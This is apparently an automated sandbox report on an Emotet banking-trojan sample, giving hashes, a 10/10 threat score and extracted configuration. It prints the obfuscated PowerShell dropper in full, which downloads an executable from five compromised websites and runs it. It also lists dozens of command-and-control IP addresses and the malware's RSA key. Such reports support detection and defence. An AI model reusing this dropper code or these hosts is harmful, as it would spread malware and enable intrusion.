SecuriteInfo.com.Exploit.Siggen2.13645.25067.4399

General
Target

SecuriteInfo.com.Exploit.Siggen2.13645.25067.4399

Completed

02-08-2020 07:38

Sample

200802-pxvad8ldbs

SHA256

4bd4448e06404510ab9d35c4f13fca11bfb149a3063e4778493a5fbe17fbd561

Score
10 /10
Malware Config

Extracted

Language ps1
Source $IQYJUppm='WKOYOzwu';[Net.ServicePointManager]::"sEC`U`Ri`TYPRoT`ocOl" = 'tls12, tls11, tls';$FYOFEndz = '659';$IWRGHkts='TFYCSgbk';$VXKIXdhc=$env:userprofile+'\'+$FYOFEndz+'.exe';$LDUTLrks='GJPIKwzq';$QGQZAtqo=&('new-'+'o'+'bject') nEt.WEbCLient;$RUUNJyzq='http://muliarental.com/wp-includes/uwr_u4_ed3qzbb/*http://ltrybus.com/cgi-bin/mff_xao9d_5ld5qajfmx/*http://my6thgen.org/_db_backups/t_e_v7qizcr2/*http://mywebnerd.com/bluesforsale/zi6_v4g0_rmyg/*http://www.naayers.org/Library/o_eo_97ml/'."SPl`iT"([char]42);$RKRZAxqs='YHVSNowi';foreach($YJLGSrkb in $RUUNJyzq){try{$QGQZAtqo."dOwn`L`oad`FiLE"($YJLGSrkb, $VXKIXdhc);$JPLAVojm='IKUCCcsk';If ((&('Get-I'+'te'+'m') $VXKIXdhc)."LEnG`TH" -ge 20603) {([wmiclass]'win32_Process')."Cre`Ate"($VXKIXdhc);$MCXCTkml='OVBMCiqa';break;$QOCQNnih='VETADnow'}}catch{}}$LMSPIdey='HYSTMbpt'
URLs
exe.dropper

http://muliarental.com/wp-includes/uwr_u4_ed3qzbb/

exe.dropper

http://ltrybus.com/cgi-bin/mff_xao9d_5ld5qajfmx/

exe.dropper

http://my6thgen.org/_db_backups/t_e_v7qizcr2/

exe.dropper

http://mywebnerd.com/bluesforsale/zi6_v4g0_rmyg/

exe.dropper

http://www.naayers.org/Library/o_eo_97ml/

Related Tasks

behavioral1behavioral2

Extracted

Family emotet
C2

142.105.151.124:443

62.108.54.22:8080

212.51.142.238:8080

71.208.216.10:80

108.48.41.69:80

83.110.223.58:443

210.165.156.91:80

104.131.44.150:8080

104.236.246.93:8080

5.39.91.110:7080

209.141.54.221:8080

209.182.216.177:443

153.126.210.205:7080

91.211.88.52:7080

180.92.239.110:8080

183.101.175.193:80

162.241.92.219:8080

87.106.139.101:8080

114.146.222.200:80

65.111.120.223:80

113.160.130.116:8443

190.160.53.126:80

62.75.141.82:80

46.105.131.87:80

203.153.216.189:7080

46.105.131.79:8080

91.231.166.124:8080

81.2.235.111:8080

189.212.199.126:443

95.9.185.228:443

169.239.182.217:8080

47.153.182.47:80

116.203.32.252:8080

139.130.242.43:80

75.139.38.211:80

41.60.200.34:80

47.144.21.12:443

103.86.49.11:8080

95.179.229.244:8080

173.91.22.41:80

70.167.215.250:8080

110.145.77.103:80

85.59.136.180:8080

5.196.74.210:8080

24.234.133.205:80

76.27.179.47:80

104.131.11.150:443

87.106.136.232:8080

61.19.246.238:443

201.173.217.124:443

rsa_pubkey.plain
-----BEGIN PUBLIC KEY----- MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhANQOcBKvh5xEW7VcJ9totsjdBwuAclxS Q0e09fk8V053lktpW3TRrzAW63yt6j1KWnyxMrU3igFXypBoI4lVNmkje4UPtIIS fkzjEIvG1v/ZNn1k0J0PfFTxbFFeUEs3AwIDAQAB -----END PUBLIC KEY-----

Related Tasks

behavioral1behavioral2
Targets
Target

SecuriteInfo.com.Exploit.Siggen2.13645.25067.4399

MD5

583da66b87c441323cb85e2585a7af92

Filesize

172KB

Score
10 /10
SHA1

72d3ed056c0cc6ca9cae1c80ce2cd37f05b33b07

SHA256

4bd4448e06404510ab9d35c4f13fca11bfb149a3063e4778493a5fbe17fbd561

SHA512

19eb9967f852f0b3510b48341dae050273817d0741edddb9fec4c931395b2d5767e9e38e59d921ec88224cd575e61f8afac36e74b4e9c8be6d955836b9eb7c84

Tags

trojan banker emotet

Related Tasks